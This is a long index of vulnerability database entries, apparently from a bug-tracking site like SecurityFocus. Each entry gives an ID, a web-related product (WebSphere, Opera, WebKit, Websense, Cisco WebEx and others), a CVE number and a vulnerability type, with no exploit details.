[80709] Active Web Mail CVE-2008-6873 SQL-Injection Vulnerability
[80680] Openwebmail CVE-2008-7202 Cross-Site Scripting Vulnerability
[80676] Webid CVE-2008-7117 Cross-Site Scripting Vulnerability
[80671] Webid CVE-2008-7119 SQL-Injection Vulnerability
[80670] Aspwebalbum CVE-2008-6977 Cross-Site Scripting Vulnerability
[80622] Websphere Application Server CVE-2009-0856 Cross-Site Scripting Vulnerability
[80573] Hutscripts Php Website Script CVE-2009-2590 SQL-Injection Vulnerability
[80559] Hutscripts Php Website Script CVE-2009-2589 Cross-Site Scripting Vulnerability
[80558] Websphere Application Server CVE-2009-2087 Denial-Of-Service Vulnerability
[80554] Opera Web Browser CVE-2009-3013 Cross-Site Scripting Vulnerability
[80533] Web Wiz Guestbook CVE-2003-1571 Information Disclosure Vulnerability
[80531] ONE Web Server CVE-2003-1589 Denial Of Service Vulnerability
[80522] ONE Web Server CVE-2003-1590 Denial Of Service Vulnerability
[80515] ONE Web Server CVE-2003-1579 Remote Security Vulnerability
[80505] QtWeb CVE-2009-3015 Cross-Site Scripting Vulnerability
[80474] Miniweb CVE-2009-3420 Cross-Site Scripting Vulnerability
[80469] Opera Web Browser CVE-2009-3265 Cross-Site Scripting Vulnerability
[80396] Website CVE-1999-0177 Remote Security Vulnerability
[80349] IBM WebSphere Commerce CVE-2015-5007 Unspecified Cross Site Request Forgery Vulnerability
[80348] IBM WebSphere Commerce CVE-2015-7397 Open Redirection Vulnerability
[80319] Fiery Webtools CVE-2009-3913 SQL-Injection Vulnerability
[80312] Miniweb CVE-2009-4552 Cross-Site Scripting Vulnerability
[80299] Com Webeecomment CVE-2009-4651 Cross-Site Scripting Vulnerability
[80290] WebMatic CVE-2009-4380 SQL-Injection Vulnerability
[80269] WebStatCaffe CVE-2009-4718 SQL-Injection Vulnerability
[80251] Ezwebsearch CVE-2009-4716 Cross-Site Scripting Vulnerability
[80229] Websense Web Filter CVE-2009-5120 Cross-Site Scripting Vulnerability
[80202] Webadmin CVE-2003-1463 Directory Traversal Vulnerability
[80163] Webwork CVE-2006-2839 Directory Traversal Vulnerability
[80159] aspWeblinks CVE-2006-2848 Remote Security Bypass Vulnerability
[80104] Webnetwork CVE-2012-4352 Cross-Site Scripting Vulnerability
[80093] Websphere Portal CVE-2014-6171 Cross-Site Scripting Vulnerability
[80090] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6163 Cross-Site Scripting Vulnerability
[80078] Security Access Manager for Web CVE-2014-6080 SQL-Injection Vulnerability
[80047] Voice Of Web Allmyguests CVE-2014-8293 Cross-Site Scripting Vulnerability
[80046] Voice Of Web Allmyguests CVE-2014-8294 SQL-Injection Vulnerability
[80038] Bacula-Web CVE-2014-8295 SQL-Injection Vulnerability
[80016] Webpress CVE-2014-8751 Cross-Site Scripting Vulnerability
[80015] Allomani Weblinks CVE-2014-8766 SQL-Injection Vulnerability
[79999] Websphere Portal CVE-2014-8902 Cross-Site Scripting Vulnerability
[79998] Web Access CVE-2014-9352 Cross-Site Scripting Vulnerability
[79996] Easy File Sharing Web Server CVE-2014-9439 Cross-Site Scripting Vulnerability
[79982] Maian Weblog CVE-2014-10007 Cross-Site Scripting Vulnerability
[79945] webtrees CVE-2014-100006 Cross-Site Scripting Vulnerability
[79878] IBM Security Access Manager for Web and Security Access Manager OS Command Injection Vulnerability
[79807] IBM WebSphere Application Server CVE-2015-5004 Information Disclosure Vulnerability
[79787] Ganeti RESTful Control Interface Information Disclosure and Denial of Service Vulnerabilities
[79779] Opera Web Browser CVE-2011-0450 Remote Security Vulnerability
[79771] Acunetix Web Vulnerability Scanner CVE-2015-4027 Local Privilege Escalation Vulnerability
[79770] Eva-Web CVE-2006-2690 Remote Security Vulnerability
[79708] AVG 'AVG Web TuneUp' Extension Security Bypass and Cross Site Scripting Vulnerabilities
[79707] Apple Safari WebKit Plug-ins CVE-2015-5828 Security Bypass Vulnerability
[79694] IBM Business Process Manager Advanced and WebSphere Process Server Security Bypass Vulnerability
[79646] RSA SecurID Web Agent CVE-2015-6851 Local Authentication Bypass Vulnerability
[79603] WebFrame CVE-2009-0514 File-Upload Vulnerability
[79596] Snippetmaster Webpage Editor CVE-2009-0530 Remote Security Vulnerability
[79540] Web File Explorer CVE-2009-1495 Information Disclosure Vulnerability
[79537] Aspwebcalendar CVE-2009-1223 Information Disclosure Vulnerability
[79533] Webcollab CVE-2009-1455 Cross-Site Request Forgery Vulnerability
[79511] IBM WebSphere Portal CVE-2015-7447 Information Disclosure Vulnerability
[79499] Opera Web Browser CVE-2009-1599 Security Bypass Vulnerability
[79481] Profense Web Application Firewall CVE-2009-1745 Remote Security Vulnerability
[79450] Websphere Application Server CVE-2009-2088 Security Bypass Vulnerability
[79448] Airlock Web Application Firewall CVE-2009-2300 Denial-Of-Service Vulnerability
[79443] Websphere Application Server CVE-2009-2746 Cross-Site Request Forgery Vulnerability
[79439] Opera Web Browser CVE-2009-2577 Denial-Of-Service Vulnerability
[79413] IBM WebSphere Commerce Suite CVE-2009-2956 Information Disclosure Vulnerability
[79412] Opera Web Browser CVE-2009-3048 Remote Security Vulnerability
[79411] Opera Web Browser CVE-2009-3049 Remote Security Vulnerability
[79401] Opera Web Browser CVE-2009-3046 Remote Security Vulnerability
[79400] Opera Web Browser CVE-2009-3044 Remote Security Vulnerability
[79395] Opera Web Browser CVE-2009-3047 Remote Security Vulnerability
[79390] Opera Web Browser CVE-2009-3045 Remote Security Vulnerability
[79385] Webauth CVE-2009-2945 Remote Security Vulnerability
[79360] Websphere Application Server CVE-2009-3106 Information Disclosure Vulnerability
[79356] Opera Web Browser CVE-2009-3269 Denial-Of-Service Vulnerability
[79336] Email and Web Security Appliance CVE-2009-3339 Remote Security Vulnerability
[79333] NaviCOPA Web Server CVE-2009-3646 Remote Security Vulnerability
[79305] Webkit CVE-2009-3933 Denial-Of-Service Vulnerability
[79294] Opera Web Browser CVE-2009-3832 Remote Security Vulnerability
[79283] WebRTC CVE-2015-7210 Use After Free Denial of Service Vulnerability
[79267] Opera Web Browser CVE-2009-4072 Remote Security Vulnerability
[79179] Webform CVE-2009-4533 Remote Security Vulnerability
[79166] Netbiter Webscada Firmware CVE-2009-4463 Denial-Of-Service Vulnerability
[79132] WebGUI CVE-2009-4877 Cross-Site Request Forgery Vulnerability
[79119] Webmathematica CVE-2009-4812 Information Disclosure Vulnerability
[79103] Web Wiz Newspad CVE-2009-5019 Information Disclosure Vulnerability
[79092] Palm Pre Webos CVE-2009-5098 Denial-Of-Service Vulnerability
[79085] Palm Pre Webos CVE-2009-5097 Remote Security Vulnerability
[79081] Palm Pre Webos CVE-2009-5071 Remote Security Vulnerability
[79067] Websense Email Security CVE-2009-5121 Security Bypass Vulnerability
[79066] Websense Email Security CVE-2009-5122 Information Disclosure Vulnerability
[79063] Websense Web Filter CVE-2009-5119 Information Disclosure Vulnerability
[79055] Websense Email Security CVE-2009-5131 Security Bypass Vulnerability
[79049] Websense V10000 CVE-2009-5128 Denial-Of-Service Vulnerability
[79047] Websense V10000 CVE-2009-5129 Denial-Of-Service Vulnerability
[79046] Websense Email Security CVE-2009-5130 Denial-Of-Service Vulnerability
[79042] Websense Web Filter CVE-2009-5132 Denial-Of-Service Vulnerability
[79034] Cisco Unified Email and Unified Web Interaction Manager Cross Site Scripting Vulnerability
[79029] Websphere Portal CVE-2010-0715 Remote Security Vulnerability
[79021] Java System Web Server CVE-2010-0360 Remote Security Vulnerability
[79003] OmniWeb CVE-2010-1102 Security Bypass Vulnerability
[78986] Com Weberpcustomer CVE-2010-1315 Directory Traversal Vulnerability
[78981] Opera Web Browser CVE-2010-1310 Information Disclosure Vulnerability
[78980] WEBi CVE-2010-1243 Remote Security Vulnerability
[78977] Com Webtv CVE-2010-1470 Directory Traversal Vulnerability
[78966] Opera Web Browser CVE-2010-1728 Denial-Of-Service Vulnerability
[78961] Websphere Application Server CVE-2010-1651 Information Disclosure Vulnerability
[78944] Websphere Application Server CVE-2010-1650 Information Disclosure Vulnerability
[78927] Rock Web Server CVE-2010-2271 Remote Security Vulnerability
[78925] Rock Web Server CVE-2010-2270 Remote Security Vulnerability
[78916] Rock Web Server CVE-2010-2269 Directory Traversal Vulnerability
[78906] Open Web Analytic CVE-2010-2677 Remote Security Vulnerability
[78905] Opera Web Browser CVE-2010-2657 Remote Security Vulnerability
[78893] H264webcam CVE-2010-2349 Denial-Of-Service Vulnerability
[78890] Open Web Analytic CVE-2010-2676 Directory Traversal Vulnerability
[78889] Opera Web Browser CVE-2010-2658 Remote Security Vulnerability
[78888] Websphere Application Server CVE-2010-2323 Information Disclosure Vulnerability
[78884] SasCam WebCam Server CVE-2010-2505 Denial-Of-Service Vulnerability
[78866] Opera Web Browser CVE-2010-3021 Denial-Of-Service Vulnerability
[78860] Opera Web Browser CVE-2010-3020 Remote Security Vulnerability
[78857] Opera Web Browser CVE-2010-3019 Denial-Of-Service Vulnerability
[78849] Weborf CVE-2010-3306 Directory Traversal Vulnerability
[78826] Websphere Application Server CVE-2010-3186 Remote Security Vulnerability
[78817] Cisco Emergency Responder Web Framework CVE-2015-6407 Arbitrary File Upload Vulnerability
[78812] Cisco Emergency Responder Service Web Framework Cross Site Request Forgery Vulnerability
[78792] Websiteadmin CVE-2010-3688 File-Upload Vulnerability
[78762] Opera Web Browser CVE-2010-4044 Denial-Of-Service Vulnerability
[78760] Opera Web Browser CVE-2010-4043 Information Disclosure Vulnerability
[78752] Opera Web Browser CVE-2010-4049 Denial-Of-Service Vulnerability
[78745] Opera Web Browser CVE-2010-4048 Denial-Of-Service Vulnerability
[78726] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[78722] WebKit CVE-2015-7050 Information Disclosure Vulnerability
[78720] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[78655] Websense Web Security CVE-2010-5146 Local Security Vulnerability
[78652] Websense Web Security CVE-2010-5144 Security Bypass Vulnerability
[78651] Websense Web Security CVE-2010-5149 Denial-Of-Service Vulnerability
[78649] Websense Web Security CVE-2010-5148 Remote Security Vulnerability
[78637] Websense Web Security CVE-2010-5147 Denial-Of-Service Vulnerability
[78629] Websense Web Security CVE-2010-5145 Denial-Of-Service Vulnerability
[78613] IBM WebSphere Portal CVE-2015-5001 Denial of Service Vulnerability
[78611] IBM WebSphere Portal CVE-2015-7413 Unspecified Cross Site Scripting Vulnerability
[78610] IBM WebSphere Portal CVE-2015-4998 Unspecified Cross Site Scripting Vulnerability
[78609] IBM WebSphere Portal CVE-2015-4993 Unspecified Cross Site Scripting Vulnerability
[78600] WebSphere MQ CVE-2011-0310 Denial-Of-Service Vulnerability
[78579] WEBi CVE-2011-1559 Remote Security Vulnerability
[78445] Opera Web Browser CVE-2011-2628 Remote Security Vulnerability
[78429] Opera Web Browser CVE-2011-2641 Denial-Of-Service Vulnerability
[78418] Cisco WebEx Meetings for Android CVE-2015-6384 Remote Security Bypass Vulnerability
[78383] Opera Web Browser CVE-2011-4681 Security Bypass Vulnerability
[78375] Opera Web Browser CVE-2011-4682 Security Bypass Vulnerability
[78371] Opera Web Browser CVE-2011-4683 Remote Security Vulnerability
[78338] Websense Web Security CVE-2011-5102 Remote Security Vulnerability
[78322] FreeWebshop CVE-2011-5147 Remote Security Vulnerability
[78315] Cisco Web Security Appliance CVE-2015-6386 Denial of Service Vulnerability
[78275] Opera Web Browser CVE-2012-1003 Denial-Of-Service Vulnerability
[78247] WebGlimpse CVE-2012-1795 Remote Security Vulnerability
[78245] Websphere Application Server CVE-2012-2162 Information Disclosure Vulnerability
[78243] Opera Web Browser CVE-2012-1251 Information Disclosure Vulnerability
[78172] Opera Web Browser CVE-2012-3563 Denial-Of-Service Vulnerability
[78171] Opera Web Browser CVE-2012-3555 Remote Security Vulnerability
[78168] Opera Web Browser CVE-2012-3558 Denial-Of-Service Vulnerability
[78167] Opera Web Browser CVE-2012-3565 Denial-Of-Service Vulnerability
[78166] Opera Web Browser CVE-2012-3561 Remote Security Vulnerability
[78164] Opera Web Browser CVE-2012-3567 Denial-Of-Service Vulnerability
[78163] Opera Web Browser CVE-2012-3559 Remote Security Vulnerability
[78158] Opera Web Browser CVE-2012-3564 Denial-Of-Service Vulnerability
[78155] Opera Web Browser CVE-2012-3557 Information Disclosure Vulnerability
[78154] WebSphere MQ CVE-2012-3295 Security Bypass Vulnerability
[78153] WebSphere Commerce CVE-2012-3298 Denial-Of-Service Vulnerability
[78151] Opera Web Browser CVE-2012-3562 Denial-Of-Service Vulnerability
[78150] Opera Web Browser CVE-2012-3568 Denial-Of-Service Vulnerability
[78148] Opera Web Browser CVE-2012-3566 Denial-Of-Service Vulnerability
[78147] Opera Web Browser CVE-2012-3560 Remote Security Vulnerability
[78134] Websense Web Security CVE-2012-4604 Remote Security Vulnerability
[78132] Zingiri Web Shop CVE-2012-4033 Remote Security Vulnerability
[78038] Opera Web Browser CVE-2013-3210 Information Disclosure Vulnerability
[78032] Payment For Webform CVE-2013-4594 Remote Security Vulnerability
[78023] WebEx CVE-2013-3425 Remote Security Vulnerability
[77972] Webid CVE-2014-5114 Remote Security Vulnerability
[77950] Security Access Manager for Web CVE-2014-6087 Information Disclosure Vulnerability
[77947] Security Access Manager for Web CVE-2014-6089 Denial-Of-Service Vulnerability
[77944] Security Access Manager for Web CVE-2014-6088 Information Disclosure Vulnerability
[77943] Websphere Portal CVE-2014-6193 Remote Security Vulnerability
[77936] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6143 Information Disclosure Vulnerability
[77933] Security Access Manager for Web CVE-2014-6083 Remote Security Vulnerability
[77931] Safenet Authentication Service Outlook Web Access CVE-2014-5359 Directory Traversal Vulnerability
[77930] Security Access Manager for Web CVE-2014-6078 Remote Security Vulnerability
[77927] Security Access Manager for Web CVE-2014-6084 Information Disclosure Vulnerability
[77922] Security Access Manager for Web CVE-2014-6086 Information Disclosure Vulnerability
[77920] Security Access Manager for Web CVE-2014-6082 Denial-Of-Service Vulnerability
[77918] Websphere Datapower Xc10 Appliance Firmware CVE-2014-6138 Remote Security Vulnerability
[77917] Security Access Manager for Web CVE-2014-6076 Remote Security Vulnerability
[77910] Wallpaper Complete Website CVE-2006-6215 SQL-Injection Vulnerability
[77898] Easy File Sharing Web Server CVE-2003-1296 Denial-Of-Service Vulnerability
[77884] ONE Web Server CVE-2003-1126 Denial-Of-Service Vulnerability
[77855] Helm Web Hosting Control Panel CVE-2006-5984 Cross-Site Scripting Vulnerability
[77744] Web Access CVE-2014-9360 Remote Security Vulnerability
[77735] IBM Integration Bus and WebSphere Message Broker CVE-2015-7399 Information Disclosure Vulnerability
[77653] IBM WebSphere Application Server CVE-2015-7450 Remote Code Execution Vulnerability
[77630] Exemys Telemetry Web Server CVE-2015-7910 Authentication Bypass Vulnerability
[77587] pWebManager CVE-2015-7774 OS Command Injection Vulnerability
[77563] IBM WebSphere Portal CVE-2015-7419 Unspecified Denial of Service Vulnerability
[77539] Oracle WebLogic Server CVE-2015-4852 Remote Code Execution Vulnerability
[77519] IBM WebSphere Commerce CVE-2015-5015 Information Disclosure Vulnerability
[77438] Cisco Web Security Appliance CVE-2015-6293 Remote Denial of Service Vulnerability
[77437] Cisco Web Security Appliance CVE-2015-6292 Denial of Service Vulnerability
[77433] Cisco Web Security Appliance CVE-2015-6298 Multiple Command Injection Vulnerabilities
[77392] Milton Webdav CVE-2015-7326 XML External Entity Multiple Information Disclosure Vulnerabilities
[77318] IBM Security Access Manager for Web CVE-2015-4963 Information Disclosure Vulnerability
[77316] IBM WebSphere Portal CVE-2014-8912 Information Disclosure Vulnerability
[77314] IBM WebSphere Portal CVE-2015-4997 Security Bypass Vulnerability
[77294] Drupal Webform CiviCRM Integration Module Cross Site Scripting Vulnerability
[77269] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[77267] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[77264] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[77259] IniNet Solutions SCADA Web Server Multiple Security Vulnerabilities
[77256] IniNet Solutions eWebServer CVE-2015-1005 Local Information Disclosure Vulnerability
[77122] Juniper Junos J-Web CVE-2014-6451 Remote Denial of Service Vulnerability
[77029] IBM Websphere Message Broker and Integration Bus CVE-2015-5011 Local Security Bypass Vulnerability
[77024] Drupal 'web-fixtures\issue130.php' Cross Site Scripting Vulnerability
[77009] Microsoft Office Web Apps Server CVE-2015-6037 Spoofing Vulnerability
[76928] Trend Web Server CVE-2015-5653 Buffer Overflow Vulnerability
[76890] EMC RSA Web Threat Detection CVE-2015-4548 Local Privilege Escalation Vulnerability
[76887] EMC RSA Web Threat Detection CVE-2015-4547 Information Disclosure Vulnerability
[76880] IcedTea-Web CVE-2015-5235 Origin Spoofing Vulnerability
[76877] IcedTea-Web CVE-2015-5234 Security Bypass Vulnerability
[76868] SAP HANA Web-based Development Workbench Cross Site Scripting Vulnerability
[76864] InduSoft Web Studio CVE-2015-7374 Remote Code Execution Vulnerability
[76808] Web Reference Database Multiple Security Vulnerabilities
[76766] WebKit APPLE-SA-2015-09-16-1 Multiple Security Vulnerabilities
[76753] Advantech WebAccess CVE-2014-9202 Local Stack Buffer Overflow Vulnerability
[76749] Splunk Web Unspecified Cross Site Scripting Vulnerability
[76731] Symantec Web Gateway CVE-2015-5693 Code Injection Vulnerability
[76730] Symantec Web Gateway CVE-2015-6547 Command Injection Vulnerability
[76729] Symantec Web Gateway CVE-2015-6548 Multiple SQL Injection Vulnerabilities
[76728] Symantec Web Gateway CVE-2015-5691 Multiple Cross Site Scripting Vulnerabilities
[76726] Symantec Web Gateway CVE-2015-5692 Arbitrary File Upload Vulnerability
[76725] Symantec Web Gateway CVE-2015-5690 Unauthorized Access Security Bypass Vulnerability
[76724] IBM WebSphere eXtreme Scale CVE-2015-2027 Security Bypass Vulnerability
[76723] IBM WebSphere eXtreme Scale CVE-2015-2031 Unspecified Cross Site Scripting Vulnerability
[76721] IBM WebSphere eXtreme Scale CVE-2015-2025 Information Disclosure Vulnerability
[76720] IBM WebSphere eXtreme Scale CVE-2015-2030 Security Bypass Vulnerability
[76719] IBM WebSphere eXtreme Scale CVE-2015-2026 Cross Site Request Forgery Vulnerability
[76718] IBM WebSphere eXtreme Scale CVE-2015-2029 Session Hijacking Vulnerability
[76716] IBM WebSphere eXtreme Scale CVE-2015-2028 HTTP Response Splitting Vulnerability
[76687] Cisco Web Security Appliance CVE-2015-6290 Denial of Service Vulnerability
[76681] WhatsApp Web 'vCard' Format Multiple Remote Code Execution Vulnerabilities
[76677] Cisco Web Security Appliance CVE-2015-6287 Denial of Service Vulnerability
[76672] Advantech WebAccess CVE-2014-9208 Multiple Stack Buffer Overflow Vulnerabilities
[76661] Webroot SecureAnywhere Mobile Protection SSL Certificate Validation Security Bypass Vulnerability
[76659] IBM WebSphere MQ CVE-2015-2013 Denial of Service Vulnerability
[76655] IBM WebSphere Portal CVE-2015-1943 Unspecified Denial of Service Vulnerability
[76617] Sunny WebBox CVE-2015-3964 Hardcoded Password Security Bypass Vulnerability
[76610] OrientDB Studio Interface Multiple Security Vulnerabilities
[76544] IBM WebSphere Commerce CVE-2015-4980 Information Disclosure Vulnerability
[76463] IBM WebSphere Application Server CVE-2015-4938 Spoofing Vulnerability
[76442] IBM Websphere Message Broker and Integration Bus CVE-2015-2018 Information Disclosure Vulnerability
[76406] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-6255 Cross Site Scripting Vulnerability
[76348] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-4298 Authorization Bypass Vulnerability
[76341] WebKit Same Origin Policy Multiple Security Bypass Vulnerabilities
[76339] Apple Safari WebKit Page Loading Information Disclosure Vulnerability
[76338] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[76332] Prisma Web Products Cross Site Request Forgery and Security Bypass Vulnerabilities
[76328] Cisco WebEx Node for MCS CVE-2015-4297 Open Redirection Vulnerability
[76234] Microsoft Windows WebDAV CVE-2015-2476 Man in the Middle Information Disclosure Vulnerability
[76147] RubyGems Sidekiq 'web.rb' Cross Site Request Forgery Vulnerability
[76133] IBM WebSphere DataPower XC10 Appliance CVE-2015-1970 Local Information Disclosure Vulnerability
[76108] Webservice-DIC yoyaku CVE-2015-2978 Unspecified Authentication Bypass Vulnerability
[76103] Webservice-DIC yoyaku CVE-2015-2977 Arbitrary File Creation Vulnerability
[76088] Git GitWeb CVE-2011-2186 HTML Injection Vulnerability
[75996] Unified MeetingPlace Web Conferencing Unauthorized Password Change Security Bypass Vulnerability
[75979] Cisco WebEx Meetings Server CVE-2015-4281 Cross Site Request Forgery Vulnerability
[75960] Cisco WebEx Training Center CVE-2015-4245 HTML Injection Vulnerability
[75957] Cisco WebEx Meeting Center CVE-2015-4247 Unspecified HTML Injection Vulnerability
[75956] Cisco WebEx Meeting Center CVE-2015-4246 Unspecified Cross Site Scripting Vulnerability
[75917] Cisco WebEx Meetings Server CVE-2015-4276 Remote Code Execution Vulnerability
[75860] Oracle E-Business Suite and WebCenter Portal CVE-2015-1926 Remote Security Vulnerability
[75859] Oracle GlassFish Server and WebLogic Server CVE-2015-2623 Remote Security Vulnerability
[75848] Oracle GlassFish Server and WebLogic Server CVE-2015-4744 Remote Security Vulnerability
[75842] Oracle Web Cache CVE-2015-2658 Remote Security Vulnerability
[75717] Juniper Junos J-Web CVE-2014-6447 Multiple Cross Site Scripting Vulnerabilities
[75709] Cisco WebEx Meeting Center CVE-2015-4249 Cross Site Scripting Vulnerability
[75703] Cisco AsyncOS for Email Security and Web Security Appliances Denial of Service Vulnerability
[75555] Roundcube Webmail Multiple Security Vulnerabilities
[75540] IBM WebSphere MQ CVE-2015-1967 Remote Information Disclosure Vulnerability
[75494] Apple Safari WebKit PDF CVE-2015-3660 Information Disclosure Vulnerability
[75492] WebKit Multiple Security Vulnerabilities
[75486] IBM WebSphere Application Server CVE-2015-1927 Remote Privilege Escalation Vulnerability
[75480] IBM WebSphere Application Server CVE-2015-1936 Session Hijacking Vulnerability
[75479] IBM WebSphere Portal CVE-2015-1917 Cross Site Scripting Vulnerability
[75478] IBM WebSphere Portal CVE-2015-1944 Unspecified Cross Site Scripting Vulnerability
[75475] IBM WebSphere Portal CVE-2015-1887 Information Disclosure Vulnerability
[75443] IBM Websphere Message Broker and Integration CVE-2015-0118 Information Disclosure Vulnerability
[75381] Cisco WebEx Meeting Center CVE-2015-4212 Unspecified Information Disclosure Vulnerability
[75361] Cisco WebEx Meeting Center CVE-2015-4208 Information Disclosure Vulnerability
[75360] IBM Business Process Manager and WebSphere Lombardi Edition Directory Traversal Vulnerability
[75351] Cisco WebEx Meeting Center CVE-2015-4209 Authorization Bypass Vulnerability
[75350] Cisco WebEx Meeting Center CVE-2015-4207 Information Disclosure Vulnerability
[75348] Cisco WebEx Meeting Center CVE-2015-4210 Cross Site Scripting Vulnerability
[75344] IBM WebSphere Commerce CVE-2015-0196 HTTP Response Splitting Vulnerability
[75326] Cisco Web Security Appliance CVE-2015-4198 HTTP Header Injection Vulnerability
[75299] OpenEMR 'interface/globals.php' Authentication Bypass Vulnerability
[75296] Cisco WebEx Meeting Center CVE-2015-4194 User Enumeration Vulnerability
[75237] Web Console CVE-2015-3224 Remote Code Execution Vulnerability
[75193] IBM WebSphere MQIPT CVE-2015-0173 Remote Information Disclosure Vulnerability
[75189] IBM Unified Extensible Firmware Interface CVE-2014-4768 Denial of Service Vulnerability
[75160] Websense Content Gateway 'handle_debug_network' Stack Buffer Overflow Vulnerability
[75050] Direct Web Remoting CVE-2014-5326 Unspecified Cross Site Scripting Vulnerability
[75036] HP WebInspect CVE-2015-2125 Unspecified Unauthorized Access Vulnerability
[74969] RSA Web Threat Detection CVE-2015-0541 Cross Site Request Forgery Vulnerability
[74938] WebDrive Multiple Stack Buffer Overflow Vulnerabilities
[74912] IBM Business Process Manager and WebSphere Lombardi Edition Cross Site Scripting Vulnerability
[74881] MAGMI Plugin For Magento Server 'web/ajax_pluginconf.php' Directory Traversal Vulnerability
[74865] Sophos Web Server Protection Security Bypass Vulnerability
[74849] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-0753 SQL Injection Vulnerability
[74802] SAP HANA Web-based Development Workbench Unspecified SQL Injection Vulnerability
[74793] WebPAC Pro 'url' Parameter Open Redirection Vulnerability
[74783] Webgrind 'file' Parameter Cross Site Scripting Vulnerability
[74763] Drupal Web Links Module Cross Site Scripting Vulnerability
[74706] IBM WebSphere MQ CVE-2015-0189 Local Denial of Service Vulnerability
[74705] IBM WebSphere Portal CVE-2015-1921 Unspecified Open Redirection Vulnerability
[74701] IBM WebSphere Commerce CVE-2014-6211 Local Information Disclosure Vulnerability
[74696] Cisco Web Security Appliance CVE-2015-0738 Cross Site Scripting Vulnerability
[74679] Fortinet FortiWeb CVE-2014-8619 Multiple Cross Site Scripting Vulnerabilities
[74670] Websense Content Gateway Security Bypass Vulnerability
[74647] Cisco WebEx Meetings Server CVE-2015-0634 Cross Site Scripting Vulnerability
[74629] Wireshark Websocket Dissector CVE-2015-3810 Denial of Service Vulnerability
[74577] WebODF CVE-2014-9716 HTML Injection Vulnerability
[74572] Cisco Unified Web and E-Mail Interaction Manager CVE-2015-4299 Security Bypass Vulnerability
[74526] WebKit CVE-2015-1154 Unspecified Memory Corruption Vulnerability
[74525] WebKit CVE-2015-1152 Unspecified Memory Corruption Vulnerability
[74523] WebKit CVE-2015-1153 Unspecified Memory Corruption Vulnerability
[74440] IBM WebSphere Commerce CVE-2014-6211 Local Information Disclosure Vulnerability
[74439] IBM WebSphere Application Server CVE-2015-1920 Remote Code Execution Vulnerability
[74384] Barracuda Web Filter SSL Certificate Multiple Security Bypass Vulnerabilities
[74371] TinyWebGallery Multiple Cross Site Request Forgery and PHP Code Injection Vulnerabilities
[74369] IBM WebSphere MQ CVE-2015-0176 Cross Site Scripting Vulnerability
[74343] Drupal Webform Multiple File Upload Module Multiple Cross Site Request Forgery Vulnerabilities
[74341] Drupal Ubercart Webform Checkout Pane Module Multiple Cross Site Scripting Vulnerabilities
[74326] IBM WebSphere MQ CVE-2014-4771 Denial of Service Vulnerability
[74324] IBM Websphere Message Broker and Integration Bus CVE-2014-6170 Information Disclosure Vulnerability
[74223] IBM WebSphere Application Server CVE-2015-0175 Remote Privilege Escalation Vulnerability
[74222] IBM WebSphere Application Server CVE-2015-1882 Remote Privilege Escalation Vulnerability
[74219] IBM WebSphere Application Server CVE-2015-1885 Remote Privilege Escalation Vulnerability
[74218] IBM WebSphere Portal and Web Content Manager CVE-2015-1908 Cross Site Scripting Vulnerability
[74216] IBM WebSphere Portal CVE-2015-1886 Unspecified Denial of Service Vulnerability
[74215] IBM WebSphere Application Server CVE-2015-0174 Information Disclosure Vulnerability
[74207] LiteSpeed Web Server 'httpreq.cpp' Use After Free Denial of Service Vulnerability
[74195] Fortinet Fortiweb Multiple Security Vulnerabilities
[74124] Oracle WebCenter Portal CVE-2015-0450 Remote Security Vulnerability
[74118] Oracle WebCenter Portal CVE-2015-0456 Remote Security Vulnerability
[74114] Oracle WebLogic Server CVE-2015-0449 Remote Security Vulnerability
[74106] Oracle WebLogic Server CVE-2015-0482 Remote Security Vulnerability
[74058] Cisco Web Security Appliance CVE-2015-0693 Local Privilege Escalation Vulnerability
[74044] Cisco Web Security Appliance CVE-2015-0692 Local Arbitrary Code Execution Vulnerability
[74018] Cisco Web Security Appliance CVE-2015-0698 Cross Site Scripting Vulnerability
[74017] Juniper Junos J-Web CVE-2015-3004 Clickjacking Vulnerability
[73986] WebKit CVE-2015-1123 Unspecified Memory Corruption Vulnerability
[73980] WebKit CVE-2015-1125 Clickjacking Vulnerability
[73977] WebKit CVE-2015-1126 Cross-Origin Security Bypass Vulnerability
[73973] WebKit Private Browsing CVE-2015-1127 Security Bypass Vulnerability
[73972] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[73958] IBM WebSphere Portal CVE-2014-8909 Unspecified Cross Site Scripting Vulnerability
[73939] Proverbs Web Calendar 'calendar.php' Multiple Cross Site Scripting Vulnerabilities
[73916] IBM WebSphere DataPower XC10 Appliance CVE-2015-1893 Session Hijacking Vulnerability
[73894] Web Patio CVE-2012-2636 Cross-Site Scripting Vulnerability
[73887] Easywebrealestate CVE-2012-5290 SQL-Injection Vulnerability
[73882] Groupware Webmail Edition CVE-2012-6640 Cross-Site Scripting Vulnerability
[73856] Mywebsearch CVE-2012-4018 Cross-Site Scripting Vulnerability
[73855] Webmail CVE-2012-4668 Cross-Site Scripting Vulnerability
[73852] Websphere Application Server CVE-2013-0596 Cross-Site Scripting Vulnerability
[73827] xweblog CVE-2010-4856 SQL-Injection Vulnerability
[73796] WEBi CVE-2011-1558 Cross-Site Scripting Vulnerability
[73793] WebSphere ILOG Rule Team Server CVE-2011-1371 Cross-Site Scripting Vulnerability
[73787] Codemeter Webadmin CVE-2011-3689 Cross-Site Scripting Vulnerability
[73746] Rock Web Server CVE-2010-2267 Cross-Site Scripting Vulnerability
[73744] Web Template Software CVE-2010-2509 Cross-Site Scripting Vulnerability
[73702] JSON Web Token Libraries Multiple Security Bypass Vulnerabilities
[73680] Opera Web Browser CVE-2010-4047 Cross-Site Scripting Vulnerability
[73636] Wiccle Web Builder CVE-2010-3208 Cross-Site Scripting Vulnerability
[73623] Websphere Portal CVE-2011-2754 Cross-Site Scripting Vulnerability
[73600] Advanced Webhost Billing System CVE-2011-0510 SQL-Injection Vulnerability
[73582] Web Server Plugin CVE-2010-2914 Cross-Site Scripting Vulnerability
[73577] Nkinfoweb CVE-2010-1599 SQL-Injection Vulnerability
[73573] Opera Web Browser CVE-2012-3556 Cross-Site Scripting Vulnerability
[73570] Opera Web Browser CVE-2010-4045 Cross-Site Scripting Vulnerability
[73567] xweblog CVE-2010-4855 SQL-Injection Vulnerability
